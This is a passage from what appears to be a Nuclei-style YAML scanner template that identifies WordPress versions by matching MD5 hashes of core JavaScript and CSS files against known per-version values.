"(\"ab2ac3c24c6921bc62dead8f7a2267af\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"bdd721bf9bc67380f681a5aacbccc827\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"b1df6eefe4d9b8d17f003a25aa50d999\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"cb8fd9b7446107dc460554e552138237\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9caf2f73114f2e3f111548fa0669f723\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/data.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"ddae0e533511267d25e72243e346d4b9\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"3b747c638a1a5115feda5deff0ba7977\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"8a70f593b4e1c7255d1477a5b943de61\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"709d82aee58b22ca25ec93d1c75e3a78\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d4dd45e5ed9e1a5015652407e00b2c2d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"c8bcea679c39308667547a54fef94033\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c0e04a64999dceed7d32e5455f7402d3\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"b212c688591871d0ff504bbb9f9e0b9c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9feabbcf952b4312e2cac9c5cf0dce2a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"64693be9b6a8e520d1ed862cb379d59e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"3ef042e6dc51effffd675f5d8d67234d\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"a9da3ceda6dfce34b69fe1bc3b1f5ee6\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5383b047c37cd2d5c32d299959c98a12\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"43521c1618feed87b76ba61e7a1e1405\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"caf92f80f4c581ade5f5205f9a943029\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"58e016381723ce43b79381262b17cdff\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"adbce747f3f9a2a3505d0ec6a6bd56da\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"ed723421685d554887d928897ba9ca45\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0d62ac9769fb2588f888cb7b959c6e98\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6decca5ae4874d5c90a9d85e2e9d3f57\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"e33bc955f23a2ccf06c284ff2b1c2a12\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"7d8068d9ae8977783cd06a11929f3b56\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4dea956ce093170c82bd7062d07064b8\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"719e21ee8faf57740ee065959f4f742f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"578e6bc0b5b398648956c85f5fecd801\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"029c6c1101d85e943386f69e65bf6f26\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"cd9314a77b72e3be21c45fa617d10a7f\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"fbf2f30961ba450c95233ebd563c64f5\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"06c30ccc5b4b2aeba1cba0cc1ace5ea4\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c0dc622a8bca4d16a05f59e19362fc17\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-models.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"eed9813bad592d4287be0eb0ebb68497\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"bc01c1de1fdb0176783247e8a754a60b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"757f7c05171d7ab9fb8c6b4ed8a68aa0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"261fa850fde903097779eb27336f8c20\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b68e8e137e8507dc7341f42269c228e6\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9b857d69f581fdac6ebcdd81b856b856\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"def5272789e7da0fd60524d1ebf96a98\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"f0b1936032cc0dc2dab420241d891412\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"7dcae0648406b44bfe02151f2af361e2\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"6fbf98b8a1f49c729b0f50628b01b9f7\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"593e7c8882f465ea251aa3707010969a\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"b631c2ad1ed6830c14f1b5b746cc33b4\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8581d9247dda1ddbdbc45bc7cba3a3fd\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"0e6f148cf0f67e2d29308754faef6829\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"25c8433aba855aa1839135b9e2d019b8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a372a9be9eb7e7e3a40e6f8c2bc52573\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"6ef4e6c8f6c08e1558bd9cb500e49b9c\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"a9329bba26e0cca4a47d899398f93117\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"540ad54618f4e167bd5eb00e305fd0f6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.min.js" - matchers: - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"ebd5a282a3cbe917233b9355f85e02e2\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"88918bacdc9909f8ca06a13085e33bb2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"cc1a6596f81f2efc3b0ef5882d8b4d00\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"31d01c6329bd9ca0f85d08d30571cedb\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"0c0b505c870b8e06552dbd22533f1de2\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"d7eeb3247587fe927808ab06acd7c64e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8dbc8c7e53f66b2da6a88bd90764a161\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.js" - matchers: - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"520d3d51ba9b168fd8ebdec6fe62355c\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"53b16e979e15d15b8665a518b3498b6c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9744d1c4fab5fcbc74d4d739b75f08e1\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"2d0388d3ce8f3e030adc78907f661184\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"268eba9cd3dcfde30616dcc01a44cf96\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c4f665635b50712ceeffcfe96419c116\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-profile.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"78429754e565545b0b996d327eb9b75a\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"c4a664eec9fe972ffa4f58a9932a6ba1\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"17c1c548cb9f35ba6c1eaa48ee95ccb7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"bb06b01380b31741cc3c6bb0475fa15e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"dea7394c000c199f8d9d89d19e4c7ab4\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"bae9b3c21bbed3ac23a9f2ed67352c25\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"d990a5a8ca17c099a994cce6fc99a63e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"6a1e4023a877503c50771b02f2d332c2\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"61e1a5c632622df1af36a7a51ac4f53f\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"62c815e5f66e17e046de2817a1af9f93\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"965a6c8c3c3e7df5310416a86ac60eb2\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"9eacd99637638c1827a085823204b32a\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"ec11a68b00ee850bd0b91ae99d11c0b3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c3bf88f3c7cdb2017fef61ed1bd09a50\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"c55941aa864653e8b3de814015477f61\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b37c7bd0f42bb0a077cdb5b5c8e15ec1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9f3731a955a2d8b3a31350a427b33898\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"fc08122eeaee48c3b094db0a1a249c25\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"a4f0e2f9a98726f3451c112c4a748650\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"bdb82a2554a8e05100eee4f970368d75\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"63cd350aa533120f942fb6817e1b8742\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"a845b846f7528f379cbfd59cbdc679f0\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"0cc751acbd9d40cfe25f0a5520899326\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"49e447a9a0db3e5863d67226c76d8168\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"aafed3503241acd9e063d0f22b8aaddf\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"e16e4c79756636ad6fb531df4c666a4d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"4c2c339725d1719abe9809b79e89d390\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"7f96038b9537a8fe2a8887a4a4893737\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1f3b6b178975e8714428fb922fb7522a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c9065688eeaa24604f824846ae4210fa\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"a80ddc28df4b919043da8a96106b1661\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"c66c6985d272f6f4a4dfc947b8a132ed\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"864ec11903d550ceea82e36ba4396a26\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"c6422380faa3101cb73ccccbdefab150\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"de756f5669035c3590ed9d4da7773a72\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"08807467493793aa5fc03fcd3cae128c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"95405e5d6077252bee8a3e9e84d10580\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3198ef3ad593013cf4756fe386035642\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"3903fb387a3c849e3369c0a2095706a7\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"ecab48a35fecb8b065c069c1ca5f9084\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"b2afc744816a8319329b934ecf6051b0\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"6111294391a90e6a53ec6c367125d532\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4512074a55d94d3becd197a007e3fe19\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"1e5ae890a49af4d069a4f732d85b1de3\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"ff964251f91913de2c95d166fa9f910d\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"96c9eb1807f5271e0e1a1b279f738b78\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"8581d6918e5aec966962ff88b92b7515\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"6f85716a47597c040d5549bbd61ff927\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1a67509c005453afa0cd06dbe22937a7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"55cda4394e062bb9e6c5dfe7565a83fb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"111154e25e5c8143f4e20a6e80b8a755\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"d148388c28a8d4c3b25b4c669849067f\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"36a186d038c83593e79d1a0cc8876bc4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9fd24eac5fad7af9e94d352633d54b33\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"10d404c76bf37fd787385e5d896247f1\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"13f22ddd59ffbf4d41b6c2dede462d9b\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"8e32de701588a0be6c747cb7ae197c8d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"d5678d078044d2a8f86cc3a6606ef1cf\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"a4e0dd8fcafad10276caad5790a642fe\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"8864a06ee8c86c6c1921c90583616c83\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"112366dc16e2df4d5b1aba549817daeb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"3c121862a0ba5b3bd489d428cc926624\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"435a0d93eeca88b2d78d085931d35c2b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"86d2fb3ee504d7846bc973f0bad27fad\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"dea6294c84c0d202c84e256b1693da9d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"d392ab4aa1d7ba0fc2c7538e62b30448\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"22727a1ae25ad30d8dfce6cb130e58da\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"c6e030f06fac0338cb5b9e5ddb9e5ff2\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c45bf2fc4b5a7acedf6e45aa1470c3e4\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"23305501a9d59a48c6e715a84624bad3\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"fc7c114669f52b57e6ba46c66dfd1525\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f66fb1ef1527ce106614d6e75045b7cb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"c5783608b75e6c0d2471d588dd6bb508\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"dcfa49b5d519db45ec284e6ea7049fc1\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"ce04388f7af80c6a43b3c259792dd813\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"45acce186fc7ed6edf6a836f996f2c75\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"72046a12cb11f7721bcb3a628cb980a1\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"4c84116c8b3a99ae8ae04d6ed5898931\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"089347821c45845393ce4abc0dff439f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"f867fd7adccd1ecdf764739053a6ec2a\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"663ac9c63302bc5276bbab270f1c0424\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"633688047d2552c2036369c8df1e9dfe\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"865c41c44ac51f501ee2fe2307950b26\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"fc48153c9c53bf2d871067cbfca6c8c4\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"eb4cd2c841fb222e136b5e7b891aea12\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"768a93266f3c54b24f0bb06f4fde09c1\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"2d464c6a8cd405d1fa8671f1a4d1f068\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"2e8fd5fd620c08c18f382baaf820c219\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"4ed4244ba484a49d295fa48d29957533\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a28c37418e809a0ece5656740522adcb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"592d60de5e62336b3958d4975b39a9b4\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"900a4b2dca39d52e01e5138aa5dacc32\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"a7cdb166af4da3afc9665deda6861f0c\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"610bf6b6680e2318c777cbfa5b0fe613\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"bd4405a8496e1b998699be2712184241\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"4dd2798490887d9026d44f2bea822fe1\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3a7cb6aeafb59c79c618e00078a42df7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"a585d4eb32332d90b23f792312bc4d8a\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"98fb96ff87f6948275e2acd843db28ad\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"68cf9b8927067500035c727ed340fea1\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"16ae38eb245d0aa76cfa9428044afcc9\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c8796229a84fa15d28de61c772a0d67a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e2f1b66e798b73956910c7f2d8f52893\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"2fe17baa6ece60bce123d487f4e528e7\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a355c6b1db46c2bc2676b24171585813\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"f085870c70630c872c3d92792417ff73\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"af368ebb8350419c26769db1ab139778\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5c2e0a8064d1714f511c0b1ff36cf592\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"395a6f36dbe8b376727438dbe52ced3e\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"7ff2e69433e8d79b333826ab10b4cbe4\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"a43eea2612ccc7873ff1394e940acf93\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"3053c3f6ef0a6dbf7e72b9329b54412c\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"4182df9ec161b300cf221e37d3a3dddf\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"2b83cfa858228147b6ec893e079e4c95\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"7e639ed3a2651581aa26e0c4f67f497c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"d76e3f993f962326e6a2336db75d3fd6\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"0c54b9433982ac1434c48071143bc050\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"fe0277eddd6929335c49e93666773745\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ae72be7c678881355fa484ebb34f76bf\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a3ef984189150a8810a060747213016b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8564e463d51205a7ba81fc3dbf47534c\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"715d5354e62c3137906fa6f108e3f09c\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9f99945db6de77cbea0b45d8152bacd7\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"14f3c0690120de73693ff29bcecc80d6\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"760a83d1bd8de7952c213a668151bce6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"41f278bf580d299962fb0228d5b3c789\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e7fbcea7585a697767b2615aadc4c414\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"30a856e5af5b41d6a2799e262b3f9a24\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"f8b5aa839f60572eb185cd1d148e0875\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"5f63b36275e6d513b4b798700f721a2a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"0e9f1d4a2fa8f8a7ae62a302e0fd2869\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"c9d0a313c14133dae9c0e10a6b85e6b2\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"f234606ce89828be50f39b60ef02995e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e6ed4125ccd101db2623aa046b627e1a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/blue/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"835228f437b76cb4336fd2db1841a984\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"fb4d3e2f7fe955aea70becac4602f87f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"dd77d909ddd0981a03cd1bcb90d2a56a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b05bd2b90583cd670ef66e4fbd08c12e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"998f2d1f4b8565cb04f4c28a3a38b611\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"09ba9aa3753dfc6aaa747e46172d7f0c\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"bff3966d07076edaf48befe021c4112b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d0afb2116a3269ab63042023468df1ec\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"96d22d6d37853b50c7cfab8dd7aa37e8\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"58b52e0c8528d52e040b8355a02eee77\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9871ee227143cdee76b565c2ce1c23f5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"476bd860a10099a51548fabfd11ac23a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f76dbe0a0a5fb610dd13cce233ed9108\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"cccef716d8a07781c8730efeaa4955d6\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.35 - dsl: - - "(\"fc23b2d4a231aba890926986f716ad05\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"e99f9ad98677585817cb3ed25b652b58\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"cb3ad1540b2fc42920d8be3f0b64609c\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"7a6af6bc5f5ebaa62ea4024bda139a0e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3584a97822fec470bd8afd83efdd3d56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/_admin.scss" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"c22ff1bb2db45ee3879ba234761ba618\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"bd2094e9dc3209e839476eba00ff5838\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"337df7168a4b60669c23c4b0343d72a8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"9f7fb552eed012f6ea9ef1807ccf2e60\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - 